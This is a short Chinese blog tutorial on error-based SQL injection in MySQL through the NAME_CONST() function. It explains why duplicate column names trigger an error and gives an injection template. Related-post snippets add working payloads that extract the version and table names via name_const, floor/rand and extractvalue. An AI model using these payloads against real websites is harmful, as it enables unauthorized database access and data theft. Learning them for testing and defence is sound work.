MYSQL 通过NAME_CONST()报错注入

最新推荐文章于 2022-04-26 09:54:18 发布
最新推荐文章于 2022-04-26 09:54:18 发布
阅读量1.8k 收藏 1
点赞数
分类专栏: sql报错注入 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46706771/article/details/112768863
版权

函数解释

NAME_CONST(name,value)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

mysql> SELECT NAME_CONST('myname', 14);
+--------+
| myname |
+--------+
|     14 |
+--------+

This function is for internal use only. The server uses it when writing statements from stored programs that contain references to local program variables, as described in [Section 19.6, “Binary Logging of Stored Programs”], You might see this function in the output from mysqlbinlog.

报错原理

mysql列名重复会导致报错,通过name_const制造一个列

我们可以利用mysql列名重复会导致报错这个原理配合join函数得到列名using 等价 join 中的On

约束条件

查询的内容需是定值(约束条件过于苛刻,可操作的内容极其少)

在这里插入图片描述

注入语句

and exists(select * from (select * from(select name_const(操作代码,0)) a join (select name_const(操作代码,0)) b)c)

举例

在这里插入图片描述

返回主页

C1yas0
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
sql注入学习笔记
cherrie007的博客
07-20 422
内容纲要: 1、 updatexml() 2、 extractvalue() 3、 floor()、count(*)、random() 4、 name_const() 一、updatexml() 【限制了最大长度为32位】 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_docum
MySQL数据库函数详解 sql学习经典
12-10
学习MySQL必备 数据库函数详解 sql学习经典 加速学习
mysql name const_mysql 中的奇葩问题:NAME_CONST
weixin_42364855的博客
02-07 425
mysql中的奇葩问题:NAME_CONST本人在一次项目开发中,开发了一个sp.这个sp很简单,就是表的内连接,然后将数据展现出来.代码如下:delimiter$$createproceduresp_dkh_single()beginset@m=0;set@1=0;selectA.tel,B.dkhidfrom(selectm()mid,telfromte...
mysql name const_MYSQL高版本注入技巧-利用NAME_CONST注入
weixin_42395462的博客
01-19 217
1、查看MYSQL版本and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c)2、爆所有库and(select 1 from(select count(*),concat((select (select (SELECT distinct ...
12种注入+万能语句
hanzhen668的博客
04-26 2335
1、通过floor,注入语句如下: and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a); 2、通过ExtractValue,注入语句如下: and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)..
const的用法_const_
09-30
const在c++中的所有用法,内容详细易懂,值得大家下载学习
_const_num.rar_if
09-19
单片机中,C语言开发时,常数的初始化,_#define,中断,_#if_else_endif的定义,以及使用
time_const.rar_xilinx 约束
09-24
时钟约束实验,在xilinx公司的spartan 3E板上通过控制按钮开关来实现对LED的控制
learn_const.zip_learn c
09-14
该文件主要用于介绍C++中const的作用及其使用方法。
member_function_const.rar_V2
09-23
This file was automatically generated img dev topazsc_v2 firmware topaz_sc bin H264MasterFirmwareVBR.dnl using dnl2c.
insert、update和delete 注入方法
黑面狐
11-28 4969
我们常见的注入都是select的查询注入比较多,但是SQL注入在参数没有检查和过滤的时候就会把恶意的数据插入数据库,从而造成SQL注入。 所有说除了查询之外,所有和数据库进行交互的请求都有可能造成注入。如:插入数据,更改数据,删除数据等,所以现在根据网上的技巧汇总一下insert、update和delete的注入方法。 以下均为注入,测试数据库版本5.7.21 利用内置函数updatex...
SQL注入Update注入
weixin_43765321的博客
03-03 5461
1. MySQL中的update函数 如果我们需要修改或更新MysQL中的数据,我们可以使用SQLUPDATE命令来操作。首先更新某一行中的一个列。 UPDATE table SET column=mew_value WHERE column= value 为lastname 是"Wilson”的人添加firstname : UPDATE Person SET FirstName = 'Fred WHERE LastName = ‘Wilson’ 更新某一行中的若干列 UPDATE table SET c
mysql name const_procedure中的mysql内部函数NAME_CONST
weixin_42318912的博客
01-27 686
mysql存储过程中的本地变量会被一个内部函数name_const转化,似乎是专门为存储过程设计的,没有提到有其它特别之处.delimiter //create procedure pload()BEGINdeclare j int default 1;while j<=1000000doinsert into test(id2,name) values(j,'aaaaaaaaaaaaaaa...
mysql 中的奇葩问题:NAME_CONST
weixin_34018169的博客
04-10 1312
mysql中的奇葩问题:NAME_CONST本人在一次项目开发中,开发了一个sp.这个sp很简单,就是表的内连接,然后将数据展现出来.代码如下:delimiter$$createproceduresp_dkh_single()beginset@m=0;set@1=0;selectA.tel,B.dkhidfrom(selectm()...
MySQL性能优化神器Explain使用分析
Stay Hungry, Stay Foolish
07-03 535
简介 我们前面介绍过慢查询,通过慢查询可以定位执行效率较差的SQL语句,定位到一个SQL语句以后,我们下面就是要探究为什么该SQL语句执行效率很低,是因为全表扫描、还是索引设置不当,这些信息都需要通过EXPLAIN来获取。 EXPLAIN命令是查看优化器如何决定执行查询的主要方法。它可以对SELECT语句进行分析,并输出SELECT执行的详细信息,以供开发人员针对性优化。EXPLAIN命令用法...
mysql常用函数参考
冰刀(skate)
05-16 2707
author:skate time:2013/05/16    mysql常用函数参考   对于针对字符串位置的操作,第一个位置被标记为1。 ASCII(str) 返回字符串str的最左面字符的ASCII代码值。如果str是空字符串,返回0。如果str是NULL,返回NULL。 mysql> select ASCII('2');     -> 50 mysql> sele
mysql name_const
最新发布
05-17
`NAME_CONST` 是 MySQL 中的一个函数,用于为一个常量赋予一个指定的名称。它的语法如下: ```sql NAME_CONST(name, value) ``` 其中,`name` 是为常量指定的名称,`value` 是常量的值。使用 `NAME_CONST` 函数可以方便地将常量赋值给某个变量,并且在查询语句中反复使用该变量。例如: ```sql SELECT * FROM my_table WHERE id = NAME_CONST('my_id', 1234); ``` 这里将常量值 1234 赋值给名为 `my_id` 的变量,然后在查询语句中使用该变量,而不是直接使用常量值。这样可以使查询语句更易于维护和重用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C1yas0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值